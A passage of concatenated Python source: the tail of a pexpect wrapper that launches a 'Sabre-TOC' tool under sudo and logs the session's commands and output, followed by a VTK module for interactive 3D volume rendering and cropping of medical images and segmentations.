cm = str(ti)+' '+str(u)+':'+' '+pmt+' '+str(cm)
if init == False:
logme = logme + '\n <\output>\n<\command>'
parse = logme.split('\n')
if parse[-1] == '<\command>':
writeme = '\n'.join(parse)
f.write(writeme)
f.flush()
logme = ''
if init == True:
init = False
logme = logme + '\n<command> %s\n <output>' % cm
else:
c.append(cmd)
return cmd
def outputCmdLog(cmd):
global pmt
global logme
cm = str(cmd, 'utf-8')
cm = escape_ansi(cm)
ti = strftime("%d-%m-%Y %H:%M:%S", localtime())
if 'OC' not in cm:
if '\n' in cm or '\r' in cm:
logme = logme + '%s' % cm
elif 'OC' in cm:
pmt = cm.split('\n')[0]
return cmd
os.system('clear')
b = subprocess.getstatusoutput('cat /opt/Sabre-TOC/sabres.txt')
b = b[1]
print(b)
v = subprocess.getstatusoutput('cat /opt/Sabre-TOC/version/version.txt')
v = v[1]
print(v)
try:
t = strftime("%d-%m-%Y_%H-%M-%S", localtime())
sd = subprocess.getstatusoutput('echo ~')
sd = sd[1]
s = pexpect.spawn("sudo -E /opt/Sabre-TOC/main.py")
sz = subprocess.getstatusoutput('stty size')
sz = sz[1]
l = str(sz).split()[0]
col = str(sz).split()[1]
s.setwinsize(int(l),int(col))
#sabreConnProc = Process(target=sabreConnFunc)
#sabreConnProc.start()
#sabreNativeConnProc = Process(target=sabreNativeConnFunc)
#sabreNativeConnProc.start()
print("Starting Sabre.........")
index = s.expect(['password', 'OC'])
if index == 0 :
p = getpass.getpass()
s.sendline(p)
elif index == 1 :
os.system('clear')
print(s.before)
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
s.interact(input_filter=userCmdLog, output_filter=outputCmdLog)
f.close()
print("\nClosed Sabre! All sessions saved")
except Exception as e:
print("s-cli failed on login.")
print(e)
|
vtktools.py
|
# Copyright (c) 2020. The Medical Image Computing (MIC) Lab, 陶豪毅
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vtk.util.vtkImageImportFromArray import *
import vtk
import numpy as np
import os
import threading
import multiprocessing
import pickle
def getRenderOfSrcImage(count, camera, renWinInteractor, numpyImage_src, spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)
numpyImage_src = maxValue * numpyImage_src / np.max(numpyImage_src)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr = vtkImageImportFromArray()
img_arr.SetArray(np.ascontiguousarray(numpyImage_src))
img_arr.SetDataSpacing(spacing)
img_arr.SetDataOrigin((0, 0, 0))
img_arr.Update()
# shifter = vtk.vtkImageShiftScale() # 对偏移和比例参数来对图像数据进行操作 数据转换,之后直接调用shifter
# shifter.SetShift(minValue)
# shifter.SetScale(maxValue)
# shifter.SetOutputScalarTypeToUnsignedShort()
# shifter.SetInputData(img_arr.GetOutput())
# shifter.ReleaseDataFlagOff()
# shifter.Update()
tcfun = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun
tcfun.AddPoint(minValue, 0.0)
tcfun.AddPoint(maxValue, 1.0)
gradtfun = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun
gradtfun.AddPoint(0, 0)
gradtfun.AddPoint(0.2, 0.1)
gradtfun.AddPoint(0.6, 0.5)
gradtfun.AddPoint(1.0, 1.0)
ctfun = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun
ctfun.AddRGBPoint(minValue, 0.5, 0.0, 0.0)
ctfun.AddRGBPoint(maxValue, 0.9, 0.2, 0.3)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper() # 映射器volumnMapper使用vtk的管线投影算法
volumeMapper_src.SetInputData(img_arr.GetOutput()) # 向映射器中输入数据:shifter(预处理之后的数据)
volumeProperty = vtk.vtkVolumeProperty() # 创建vtk属性存放器,向属性存放器中存放颜色和透明度
volumeProperty.SetColor(ctfun)
volumeProperty.SetScalarOpacity(tcfun)
volumeProperty.SetGradientOpacity(gradtfun)
volumeProperty.SetInterpolationTypeToLinear() # ???
volumeProperty.ShadeOn()
render_volume = vtk.vtkVolume() # 演员
render_volume.SetMapper(volumeMapper_src)
render_volume.SetProperty(volumeProperty)
render.AddActor(outlineActor)
render.AddVolume(render_volume)
render.ResetCamera()
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(10)
sliderRep_min.SetValue(1)
sliderRep_min.SetTitleText("minValue")
sliderRep_min.SetSliderLength(0.025)
sliderRep_min.SetSliderWidth(0.05)
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(0.15 / count, 0.1)
sliderRep_min.GetPoint2Coordinate().SetValue(0.45 / count, 0.1)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(10)
sliderRep_max.SetValue(9)
sliderRep_max.SetTitleText("maxValue")
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.05)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(0.55 / count, 0.1)
sliderRep_max.GetPoint2Coordinate().SetValue(0.85 / count, 0.1)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
def update_minmax(obj, ev):
# print(obj)
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
# reset value
if minValue >= maxValue:
if obj == sliderWidget_max:
sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))
elif obj == sliderWidget_min:
sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
tcfun.RemoveAllPoints()
tcfun.AddPoint(minValue, 0.0)
tcfun.AddPoint(maxValue, 1.0)
volumeProperty.SetScalarOpacity(tcfun)
sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_min.EnabledOn()
sliderWidget_max.EnabledOn()
return render, sliderWidget_min, sliderWidget_max
def getRenderOfSegImage(count, camera, renWinInteractor, numpyImage_seg, spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_seg = numpyImage_seg.astype(np.float32) - np.min(numpyImage_seg)
numpyImage_seg = maxValue * numpyImage_seg / np.max(numpyImage_seg)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr_seg = vtkImageImportFromArray()
img_arr_seg.SetArray(np.ascontiguousarray(numpyImage_seg))
img_arr_seg.SetDataSpacing(spacing)
img_arr_seg.SetDataOrigin((0, 0, 0))
img_arr_seg.Update()
tcfun_seg = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun
tcfun_seg.AddPoint(minValue, 0.0)
tcfun_seg.AddPoint(maxValue, 1.0)
gradtfun_seg = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun
gradtfun_seg.AddPoint(0, 0)
gradtfun_seg.AddPoint(0.2, 0.1)
gradtfun_seg.AddPoint(0.6, 0.3)
gradtfun_seg.AddPoint(1.0, 0.6)
ctfun_seg = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun
ctfun_seg.AddRGBPoint(minValue, 0.1, 0.9, 0.0)
ctfun_seg.AddRGBPoint(maxValue, 0.1, 0.9, 0.3)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr_seg.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
volumeMapper_seg = vtk.vtkGPUVolumeRayCastMapper() # 映射器volumnMapper使用vtk的管线投影算法
volumeMapper_seg.SetInputData(img_arr_seg.GetOutput()) # 向映射器中输入数据:shifter(预处理之后的数据)
volumeProperty_seg = vtk.vtkVolumeProperty() # 创建vtk属性存放器,向属性存放器中存放颜色和透明度
volumeProperty_seg.SetColor(ctfun_seg)
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
volumeProperty_seg.SetGradientOpacity(gradtfun_seg)
volumeProperty_seg.SetInterpolationTypeToLinear() # ???
volumeProperty_seg.ShadeOn()
render_volume_seg = vtk.vtkVolume() # 演员
render_volume_seg.SetMapper(volumeMapper_seg)
render_volume_seg.SetProperty(volumeProperty_seg)
render.AddActor(outlineActor)
render.AddVolume(render_volume_seg)
render.ResetCamera()
return render
def getRenderOfSrcImageWithClip(count, camera, renWinInteractor, numpyImage_src, spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)
numpyImage_src = maxValue * numpyImage_src / np.max(numpyImage_src)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr = vtkImageImportFromArray()
img_arr.SetArray(np.ascontiguousarray(numpyImage_src))
img_arr.SetDataSpacing(spacing)
img_arr.SetDataOrigin((0, 0, 0))
img_arr.Update()
tcfun = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun
tcfun.AddPoint(minValue, 0.0)
# tcfun.AddPoint(minValue + 1, 0.3)
tcfun.AddPoint(maxValue, 1.0)
gradtfun = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun
gradtfun.AddPoint(0.0, 0.3)
gradtfun.AddPoint(0.2, 0.4)
gradtfun.AddPoint(0.6, 0.6)
gradtfun.AddPoint(1.0, 1.0)
ctfun = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun
ctfun.AddRGBPoint(minValue, 0.0, 0.0, 0.0)
ctfun.AddRGBPoint(maxValue, 1.0, 1.0, 1.0)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
dims = img_arr.GetOutput().GetDimensions()
print(dims)
extractVOI = vtk.vtkExtractVOI()
extractVOI.SetInputConnection(img_arr.GetOutputPort())
extractVOI.SetVOI(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1)
extractVOI.Update()
print(extractVOI.GetOutput().GetDimensions())
volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper() # 映射器volumnMapper使用vtk的管线投影算法
volumeMapper_src.SetInputData(extractVOI.GetOutput()) # 向映射器中输入数据:shifter(预处理之后的数据)
volumeProperty = vtk.vtkVolumeProperty() # 创建vtk属性存放器,向属性存放器中存放颜色和透明度
volumeProperty.SetColor(ctfun)
volumeProperty.SetScalarOpacity(tcfun)
volumeProperty.SetGradientOpacity(gradtfun)
volumeProperty.SetInterpolationTypeToLinear() # ???
volumeProperty.ShadeOn()
render_volume = vtk.vtkVolume() # 演员
render_volume.SetMapper(volumeMapper_src)
render_volume.SetProperty(volumeProperty)
render.AddActor(outlineActor)
render.AddVolume(render_volume)
render.ResetCamera()
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(10)
sliderRep_min.SetValue(1)
sliderRep_min.SetTitleText("minValue")
sliderRep_min.SetSliderLength(0.025)
sliderRep_min.SetSliderWidth(0.05)
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.05)
sliderRep_min.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.45)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(10)
sliderRep_max.SetValue(9)
sliderRep_max.SetTitleText("maxValue")
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.05)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.55)
sliderRep_max.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.95)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
def update_minmax(obj, ev):
# print(obj)
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
# # reset value
if minValue >= maxValue:
if obj == sliderWidget_max:
sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))
elif obj == sliderWidget_min:
sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
tcfun.RemoveAllPoints()
tcfun.AddPoint(minValue, 0.0)
tcfun.AddPoint(maxValue, 1.0)
volumeProperty.SetScalarOpacity(tcfun)
print('update_minmax')
sliceActor_i_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_i_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_max.GetProperty().SetColorWindow(maxValue - minValue)
##########################################################
sliceActor_i_min = vtk.vtkImageSlice()
sliceMapper_i_min = vtk.vtkImageSliceMapper()
sliceMapper_i_min.SetInputData(img_arr.GetOutput())
sliceMapper_i_min.SetOrientationToX()
sliceMapper_i_min.SetSliceNumber(0)
sliceActor_i_min.SetMapper(sliceMapper_i_min)
sliceActor_j_min = vtk.vtkImageSlice()
sliceMapper_j_min = vtk.vtkImageSliceMapper()
sliceMapper_j_min.SetInputData(img_arr.GetOutput())
sliceMapper_j_min.SetOrientationToY()
sliceMapper_j_min.SetSliceNumber(0)
sliceActor_j_min.SetMapper(sliceMapper_j_min)
sliceActor_k_min = vtk.vtkImageSlice()
sliceMapper_k_min = vtk.vtkImageSliceMapper()
sliceMapper_k_min.SetInputData(img_arr.GetOutput())
sliceMapper_k_min.SetOrientationToZ()
sliceMapper_k_min.SetSliceNumber(0)
sliceActor_k_min.SetMapper(sliceMapper_k_min)
sliceActor_i_max = vtk.vtkImageSlice()
sliceMapper_i_max = vtk.vtkImageSliceMapper()
sliceMapper_i_max.SetInputData(img_arr.GetOutput())
sliceMapper_i_max.SetOrientationToX()
sliceMapper_i_max.SetSliceNumber(dims[0])
sliceActor_i_max.SetMapper(sliceMapper_i_max)
sliceActor_j_max = vtk.vtkImageSlice()
sliceMapper_j_max = vtk.vtkImageSliceMapper()
sliceMapper_j_max.SetInputData(img_arr.GetOutput())
sliceMapper_j_max.SetOrientationToY()
sliceMapper_j_max.SetSliceNumber(dims[1])
sliceActor_j_max.SetMapper(sliceMapper_j_max)
sliceActor_k_max = vtk.vtkImageSlice()
sliceMapper_k_max = vtk.vtkImageSliceMapper()
sliceMapper_k_max.SetInputData(img_arr.GetOutput())
sliceMapper_k_max.SetOrientationToZ()
sliceMapper_k_max.SetSliceNumber(dims[2])
sliceActor_k_max.SetMapper(sliceMapper_k_max)
sliceActor_i_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_i_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_max.GetProperty().SetColorWindow(maxValue - minValue)
render.AddActor(sliceActor_i_min)
render.AddActor(sliceActor_j_min)
render.AddActor(sliceActor_k_min)
render.AddActor(sliceActor_i_max)
render.AddActor(sliceActor_j_max)
render.AddActor(sliceActor_k_max)
#####################################################################
sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_min.EnabledOn()
sliderWidget_max.EnabledOn()
def getCropSlider(dim_index, dim_size):
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(dim_size - 1)
sliderRep_min.SetValue(0)
sliderRep_min.SetSliderLength(0.025) # 滑块 长度
sliderRep_min.SetSliderWidth(0.025) # 滑块 宽度
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.05)
sliderRep_min.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.45)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(dim_size - 1)
sliderRep_max.SetValue(dim_size - 1)
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.025)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.55)
sliderRep_max.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.95)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
return sliderWidget_min, sliderWidget_max
def update_crop(obj, ev):
# print(obj)
dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()
dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()
dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()
dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()
dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()
dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()
# # reset value
if dim1_minValue >= dim1_maxValue:
if obj == dim1_sliderWidget_max:
dim1_sliderWidget_max.GetRepresentation().SetValue(max(dim1_maxValue, dim1_minValue + 1))
elif obj == dim1_sliderWidget_min:
dim1_sliderWidget_min.GetRepresentation().SetValue(min(dim1_maxValue - 1, dim1_minValue))
if dim2_minValue >= dim2_maxValue:
if obj == dim2_sliderWidget_max:
dim2_sliderWidget_max.GetRepresentation().SetValue(max(dim2_maxValue, dim2_minValue + 1))
elif obj == dim2_sliderWidget_min:
dim2_sliderWidget_min.GetRepresentation().SetValue(min(dim2_maxValue - 1, dim2_minValue))
if dim3_minValue >= dim3_maxValue:
if obj == dim3_sliderWidget_max:
dim3_sliderWidget_max.GetRepresentation().SetValue(max(dim3_maxValue, dim3_minValue + 1))
elif obj == dim3_sliderWidget_min:
dim3_sliderWidget_min.GetRepresentation().SetValue(min(dim3_maxValue - 1, dim3_minValue))
dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()
dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()
dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()
dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()
dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()
dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()
print(dim1_minValue, dim1_maxValue)
print(dims)
extractVOI.SetVOI(int(dim1_minValue), int(dim1_maxValue),
int(dim2_minValue), int(dim2_maxValue),
int(dim3_minValue), int(dim3_maxValue))
extractVOI.Update()
print(extractVOI.GetOutput().GetDimensions())
print('update_crop')
sliceMapper_i_min.SetSliceNumber(int(dim1_minValue))
sliceMapper_j_min.SetSliceNumber(int(dim2_minValue))
sliceMapper_k_min.SetSliceNumber(int(dim3_minValue))
sliceMapper_i_max.SetSliceNumber(int(dim1_maxValue))
sliceMapper_j_max.SetSliceNumber(int(dim2_maxValue))
sliceMapper_k_max.SetSliceNumber(int(dim3_maxValue))
dim1_sliderWidget_min, dim1_sliderWidget_max = getCropSlider(1, dim_size=dims[0])
dim2_sliderWidget_min, dim2_sliderWidget_max = getCropSlider(2, dim_size=dims[1])
dim3_sliderWidget_min, dim3_sliderWidget_max = getCropSlider(3, dim_size=dims[2])
dim1_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim1_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim2_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim2_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim3_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim3_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim1_sliderWidget_min.EnabledOn()
dim1_sliderWidget_max.EnabledOn()
dim2_sliderWidget_min.EnabledOn()
dim2_sliderWidget_max.EnabledOn()
dim3_sliderWidget_min.EnabledOn()
dim3_sliderWidget_max.EnabledOn()
return render, sliderWidget_min, sliderWidget_max
def getRenderSrcWithSeg(camera,
renWinInteractor,
renWin,
numpyImage_src,
numpyImage_segs,
spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)
numpyImage_src = maxValue * numpyImage_src / np.max(numpyImage_src)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr_src = vtkImageImportFromArray()
img_arr_src.SetArray(np.ascontiguousarray(numpyImage_src))
img_arr_src.SetDataSpacing(spacing)
img_arr_src.SetDataOrigin((0, 0, 0))
img_arr_src.Update()
tcfun_src = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun
tcfun_src.AddPoint(minValue + 1, 1.0)
tcfun_src.AddPoint(maxValue, 1.0)
gradtfun_src = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun
gradtfun_src.AddPoint(0.0, 0.0)
gradtfun_src.AddPoint(1.0, 0.6)
gradtfun_src.AddPoint(3.0, 0.8)
gradtfun_src.AddPoint(maxValue, 1.0)
ctfun_src = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun
ctfun_src.AddRGBPoint(minValue, 0.9, 0.1, 0.1)
ctfun_src.AddRGBPoint(maxValue, 0.9, 0.1, 0.1)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr_src.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper() # 映射器volumnMapper使用vtk的管线投影算法
volumeMapper_src.SetInputData(img_arr_src.GetOutput()) # 向映射器中输入数据:shifter(预处理之后的数据)
volumeProperty_src = vtk.vtkVolumeProperty() # 创建vtk属性存放器,向属性存放器中存放颜色和透明度
volumeProperty_src.SetColor(ctfun_src)
volumeProperty_src.SetScalarOpacity(tcfun_src)
volumeProperty_src.SetGradientOpacity(gradtfun_src)
volumeProperty_src.SetInterpolationTypeToLinear() # ???
volumeProperty_src.ShadeOn()
render_volume_src = vtk.vtkVolume() # 演员
render_volume_src.SetMapper(volumeMapper_src)
render_volume_src.SetProperty(volumeProperty_src)
render.AddActor(outlineActor)
render.AddVolume(render_volume_src)
volumeProperty_segs = []
for i, numpyImage_seg in enumerate(numpyImage_segs):
print("add seg")
numpyImage_seg = numpyImage_seg.astype(np.float32) - np.min(numpyImage_seg)
numpyImage_seg = maxValue * numpyImage_seg / np.max(numpyImage_seg)
numpyImage_seg = (numpyImage_seg > 4) * 10.0
img_arr_seg = vtkImageImportFromArray()
img_arr_seg.SetArray(np.ascontiguousarray(numpyImage_seg))
img_arr_seg.SetDataSpacing(spacing)
img_arr_seg.SetDataOrigin((0, 0, 0))
img_arr_seg.Update()
tcfun_seg = vtk.vtkPiecewiseFunction() # 不透明度传输函数---放在tfun
tcfun_seg.AddPoint(minValue + 1, 0.2)
tcfun_seg.AddPoint(maxValue, 0.2)
gradtfun_seg = vtk.vtkPiecewiseFunction() # 梯度不透明度函数---放在gradtfun
gradtfun_seg.AddPoint(minValue, 0.0)
gradtfun_seg.AddPoint(1.0, 0.3)
gradtfun_seg.AddPoint(maxValue, 0.5)
ctfun_seg = vtk.vtkColorTransferFunction() # 颜色传输函数---放在ctfun
ctfun_seg.AddRGBPoint(minValue, 0.9 * i, 0.9, 0.0)
ctfun_seg.AddRGBPoint(maxValue, 0.9 * i, 0.9, 0.3)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr_seg.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
volumeMapper_seg = vtk.vtkGPUVolumeRayCastMapper() # 映射器volumnMapper使用vtk的管线投影算法
volumeMapper_seg.SetInputData(img_arr_seg.GetOutput()) # 向映射器中输入数据:shifter(预处理之后的数据)
volumeProperty_seg = vtk.vtkVolumeProperty() # 创建vtk属性存放器,向属性存放器中存放颜色和透明度
volumeProperty_seg.SetColor(ctfun_seg)
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
